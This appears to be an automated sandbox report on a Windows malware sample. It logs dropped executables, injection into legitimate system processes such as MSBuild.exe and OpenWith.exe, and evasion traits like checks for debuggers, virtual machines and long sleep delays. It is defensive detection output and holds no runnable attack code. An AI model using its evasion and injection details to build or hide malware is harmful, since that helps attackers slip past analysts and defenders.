                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpack, Messages.cs.Net Code: Memory
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,7_2_00406D5D
                      Source: rtl120.bpl.7.drStatic PE information: real checksum: 0x11a2e4 should be: 0x11ae83
                      Source: V3.exe.9.drStatic PE information: real checksum: 0x0 should be: 0x6f036
                      Source: tqco.32.drStatic PE information: real checksum: 0x0 should be: 0x12550
                      Source: file.exeStatic PE information: real checksum: 0x33302 should be: 0x27fe33
                      Source: cfi.14.drStatic PE information: real checksum: 0x0 should be: 0x12550
                      Source: V3.exe.9.drStatic PE information: section name: .textbss
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00411C20 push eax; ret 7_2_00411C4E
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C96A80 push edx; ret 10_3_00C96A81
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C94C95 push es; retf 10_3_00C94C91
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C95E69 push ebx; iretd 10_3_00C95E6A
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C94C62 push es; retf 10_3_00C94C91
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C961E2 push eax; retf 10_3_00C961F1
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C947A2 push ebp; iretd 10_3_00C947A3
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C92F50 push eax; retf 10_3_00C92F51
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C94170 push ecx; iretd 10_3_00C9417C
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C96777 push esi; ret 10_3_00C96782
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C94130 pushad ; ret 10_3_00C94138
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C3C01A push ds; iretd 10_2_00C3C036
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C912F4 push ecx; ret 10_2_00C91307
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C31436 push ds; retf 10_2_00C3143B
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C3E5F8 push ebx; ret 10_2_00C3E5F9
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02724262 push eax; retf 13_3_02724271
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02722822 push ebp; iretd 13_3_02722823
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02722CE2 push es; retf 13_3_02722D11
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02723EE9 push ebx; iretd 13_3_02723EEA
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02722D15 push es; retf 13_3_02722D11
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02724B00 push edx; ret 13_3_02724B01
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_027221F0 push ecx; iretd 13_3_027221FC
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_027247F7 push esi; ret 13_3_02724802
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02720FD0 push eax; retf 13_3_02720FD1
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_027221B0 pushad ; ret 13_3_027221B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D451C8 pushad ; ret 25_2_00D451C9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D45474 pushfd ; ret 25_2_00D45475
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D439E8 push ebx; retf 25_2_00D43ADA
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 25_2_00D43A18 push ebx; retf 25_2_00D43ADA
                      Source: C:\Windows\System32\dllhost.exeCode function: 27_2_00000213BBF50B44 push ss; ret 27_2_00000213BBF50B46
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cfiJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vcl120.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\tqcoJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vclx120.bplJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\rtl120.bplJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeFile created: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\rtl120.bplJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vcl120.bplJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\vclx120.bplJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cfiJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\tqcoJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CFI
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\TQCO
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeAPI/Special instruction interceptor: Address: 6D1F7C44
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 7FFB2CECD044
                      Source: C:\Windows\SysWOW64\OpenWith.exeAPI/Special instruction interceptor: Address: 4DDA83A
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeAPI/Special instruction interceptor: Address: 6D1F7945
                      Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6D1F3B54
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PROCESSHACKER.EXE
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HOOKEXPLORER.EXE
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHACKER.EXEIDAQ64.
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AP.EXEDE4DOT.EXEHOOKEXPLORER.EXEILSPY.EXELORDP
                      Source: OpenWith.exe, 0000000D.00000002.1394433791.0000000004480000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDUMP.EXE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 28C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: A20000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2400000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: 2200000 memory reserve | memory write watch
                      Source: C:\Windows\System32\dllhost.exeCode function: GetAdaptersInfo,27_2_00000213BBF52AC4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6317Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3408Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cfiJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\tqcoJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2864Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1848Thread sleep count: 6317 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1848Thread sleep count: 3408 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7396Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\OpenWith.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,7_2_0040301A
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,7_2_00402B79
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C8A165 FindFirstFileExW,10_2_00C8A165
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218822DC GetSystemInfo,VirtualAlloc,17_3_00007DF4218822DC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                      Source: SendBugReportNew.exe, 00000009.00000002.1404127146.0000000002D49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6vmware
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                      Source: OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                      Source: OpenWith.exe, 0000000D.00000002.1394291501.0000000002A5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                      Source: cmd.exe, 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                      Source: OpenWith.exe, 0000000D.00000002.1394291501.0000000002A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                      Source: OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: MSBuild.exe, 00000019.00000002.3765090379.0000000000DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: OpenWith.exe, 00000011.00000003.1444820986.000001F6663B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink)
                      Source: C:\Users\user\AppData\Local\Temp\SendBugReportNew.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C89AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C89AB4
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,7_2_00406D5D
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_3_00C92277 mov eax, dword ptr fs:[00000030h]10_3_00C92277
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C92277 mov eax, dword ptr fs:[00000030h]10_2_00C92277
                      Source: C:\Windows\SysWOW64\OpenWith.exeCode function: 13_3_02720283 mov eax, dword ptr fs:[00000030h]13_3_02720283
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C84E5A GetProcessHeap,RtlAllocateHeap,GetModuleFileNameW,_wcsrchr,lstrlenW,GetProcessHeap,RtlFreeHeap,MulDiv,10_2_00C84E5A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C89AB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C89AB4
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C85A33 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00C85A33
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C855A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00C855A9
